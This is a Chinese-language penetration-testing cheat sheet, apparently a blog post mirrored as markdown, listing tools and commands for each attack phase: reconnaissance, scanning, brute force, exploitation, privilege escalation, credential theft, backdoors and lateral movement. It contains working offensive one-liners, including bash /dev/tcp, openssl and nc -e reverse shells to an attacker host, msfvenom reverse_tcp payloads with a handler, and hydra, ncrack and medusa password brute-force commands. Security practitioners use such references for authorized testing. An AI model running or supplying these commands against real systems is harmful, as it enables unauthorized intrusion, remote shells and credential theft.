Skip to content

Latest commit

 

History

History
344 lines (212 loc) · 7.35 KB

渗透测试各阶段工具速查 (持续更新).md

File metadata and controls

344 lines (212 loc) · 7.35 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

前言

本文是渗透测试各阶段工具和快速用法速查笔记,将会持续更新。

站点信息收集

Google
Fofa
Shodan
Zoomeye
Goby
whatweb
Github
robtex

快速探测存活主机

nmap

nmap 172.18.2.1/24 -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oG result.txt
nmap 172.18.2.1/24 -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oX result.xml
nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oG result.txt -iL ip.txt

格式化输出存活 ip,做后续详细扫描使用
https://github.com/echohun/tools/blob/master/web%E6%89%AB%E6%8F%8F/nmap_clean_data.py

-sS:使用SYN方式扫描,默认用的是-sT方式,即TCP方式,需要完成完整的三次握手,比较费时,SYN就比较快一些了;
-Pn:禁用PING检测,这样速度快,并且可以防止有些主机无法ping通而被漏掉不扫描;
-n:禁止DNS反向解析;
–open:只输出检测状态为open的端口,即开放的端口;
–min-hostgroup 4:调整并行扫描组的大小;
–min-parallelism 1024:调整探测报文的并行度;
–host-timeout 30:检测超时的跳过
-T4:总共有T0-T5,貌似T4比较折中
-v:打印详细扫描过程
-oG:输出为比较人性化的格式,一条记录一行,后期好处理
-iL:载入ip段文件,批量扫,不用一条条执行了。

ipscan

快速探测端口

masscan 的发包速度非常快,在 windows 中,它的发包速度可以达到每秒 30 万包;在 Linux 中,速度可以达到每秒 160 万。masscan 在扫描时会随机选择目标 IP,所以不会对远程的主机造成压力。
https://www.freebuf.com/sectool/112583.html

masscan 172.18.2.1 -p1-65535 --rate=10000
masscan -p80,8080-8100 10.0.0.0/8 -oL result_mas.txt --rate=10000
masscan -p80,8080-8100 10.0.0.0/8 -oX result_mas.txt --rate=10000

邮箱搜集工具

EmailSniper

子域名收集

SubDominscanner

指纹收集

whatweb -v http://baidu.com

web 目录扫描

御剑

Dirbuster

https://www.jianshu.com/p/79c7b1eda56e

webpathbrute

漏洞扫描

wvs

burpsuite

nessus(强烈推荐)

xray

爆破

hydra

hydra -V -l fakeroot -P top100.txt 172.18.2.177 ssh
hydra -V -l admin -P top100.txt 172.18.2.177 rdp
hydra -V -l root -P top100.txt 172.18.2.177 mysql

ncrack

ncrack -vv -d10 -user root -P top100.txt 172.18.2.177 -p ssh -g CL=10,at=3
ncrack -vv -d10 -user root -P top100.txt 172.18.2.177 -p mysql -g CL=10,at=3

medusa

medusa -v 6 -h 172.18.2.177 -u fakeroot -P top100.txt -M ssh -t 10 -O out.txt
medusa -v 6 -h 172.18.2.177 -u root -P top100.txt -M mysql -t 10 -O out.txt

漏洞利用

metasploit

burpsuite

sqlmap

xxer (xml 注入利用工具) https://github.com/TheTwitchy/xxer

ysoserial (反序列化利用工具) https://github.com/frohoff/ysoserial

Struts2-Scan (struts2 历史漏洞扫描和利用) https://github.com/HatBoy/Struts2-Scan

weblogicScanner (weblogic 历史漏洞扫描利用) https://github.com/0xn0ne/weblogicScanner

exphub (常见 web 框架 cve 利用) https://github.com/zhzyker/exphub

cve,cms,中间件,OA 系统漏洞 exp 合集
https://github.com/mai-lang-chai/Middleware-Vulnerability-detection

webshell

菜刀

蚁剑

冰蝎

cobalt strike

普通反弹 shell

bash -i >& /dev/tcp/HOST/PORT 0>&1

加密 shell

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.xx.xx:4444 > /tmp/s; rm /tmp/s

nc

攻击机 nc -lvp 4444
靶机 nc -e /bin/bash xx.xx.xx.xx 4444

提权

sudo 提权
http://next.uuzdaisuki.com/2020/02/12/linux%E5%B8%B8%E8%A7%81%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/

各类 exp
典型通杀: 脏牛 CVE-2016-5195

metasploit

本地漏洞扫描工具

windows/linux exploit suggester

本地口令获取和破解

hash-identifier 判断哈希类型

mimikatz

Mimipenguin

LaZagne
http://next.uuzdaisuki.com/2019/12/07/%E4%B8%A4%E6%AC%BE%E5%AF%86%E7%A0%81%E6%8F%90%E5%8F%96%E5%B7%A5%E5%85%B7%E7%9A%84%E9%85%8D%E7%BD%AE%E5%92%8C%E4%BD%BF%E7%94%A8/

hashcat + 口令字典
http://next.uuzdaisuki.com/2020/07/28/%E5%93%88%E5%B8%8C%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4%E5%B7%A5%E5%85%B7hashcat/

--hash-type 0 --attack-mode 0
-m选择哈希类型
1000为windows nt hash
-a选择模式
0 Straight(字典破解)
1 Combination(组合破解)
3 Brute-force(掩码暴力破解)
6 Hybrid dict + mask(混合字典+掩码)
7 Hybrid mask + dict(混合掩码+字典)

本地信息收集

linuxprivchecker

LinEnum

后门

常见后门手法

metasploit

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f elf -o reverse_tcp_linux64
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f exe -o reverse_tcp.exe
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST xxx.xxx.xxx.xxx
set LPORT 4444
run

常用后续命令
https://www.cnblogs.com/backlion/p/9484949.html

python 直连反弹 shell
http://next.uuzdaisuki.com/2018/06/17/%E5%9F%BA%E4%BA%8Epython%E7%9A%84%E7%9B%B4%E8%BF%9Eshell%E5%92%8C%E5%8F%8D%E5%B0%84shell/
其他语言直连反弹 shell

windows 常见奇淫技巧后门手法
http://next.uuzdaisuki.com/2018/06/18/windows%E5%B8%B8%E7%94%A8%E5%90%8E%E9%97%A8%E6%8A%80%E6%9C%AF%E5%8F%8A%E9%98%B2%E8%8C%83/

内网横向渗透

Hydra

nessus

metasploit

nmap

powersploit

Empire

Psnmap

lcx

ew

tunna

proxychains

FRP

N2N

内网命令执行和文件访问

at

schtasks

telnet

sc

wmic

wmiexec.vbs

python impacket wmiexec.py

psexec

远程桌面

arp 欺骗

Cain

Arpspoof

远控

pupy 类远控

teamview

pcanywhere

radmin

手机端

DroidJack

Dendroid

典型 windows-rce

ms17-010 基本通杀

cve-2019-0708 开放 3389 情况 windows7 及之前通杀

实用工具

q-dir 文件管理工具,可开四个窗口

beyond compare 文件 / 文本比较工具

cmder 命令行工具

everything 文件搜索工具

navicat 数据库连接工具,支持超多种类数据库,支持导出数据,甚至提供拖库的 tunnel.php 等

悬剑 3.0 超齐全 windows 工具库系统

作者:Leticia,文章来源:Leticia's Blog

一如既往的学习,一如既往的整理,一如即往的分享。感谢支持

“如侵权请私聊公众号删文”

扫描关注 LemonSec

觉得不错点个 “赞”、“在看” 哦****